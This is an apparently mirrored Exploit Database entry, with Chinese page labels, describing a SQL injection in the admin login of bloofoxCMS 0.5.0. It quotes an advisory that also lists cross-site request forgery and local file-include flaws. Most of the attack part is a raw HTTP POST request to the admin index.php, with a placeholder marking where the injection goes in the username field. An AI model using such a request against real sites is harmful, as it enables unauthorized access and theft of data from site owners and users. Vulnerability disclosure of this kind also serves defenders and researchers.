BloofoxCMS – ‘/bloofox/admin/index.php?Username’ SQL Injection

• Exploit Database
• 13 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2014-01-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39030/

• source: https://www.securityfocus.com/bid/65019/info
   
  bloofoxCMS is prone to the following security vulnerabilities:
   
  1. Multiple SQL-injection vulnerabilities
  2. Multiple cross-site request forgery vulnerabilities
  3. A local file-include vulnerability
   
  Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, obtain sensitive information, execute arbitrary server-side script code or bypass certain security restrictions to perform unauthorized actions.
   
  bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected. 
  
  http://localhost/bloofox/admin/index.php
  
  
  POST /bloofox/admin/index.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
  Firefox/26.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://localhost/bloofox/admin/
  Cookie:
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 41
  
  action=login&password=IPHOBOS&username=\[SQL INJECTION]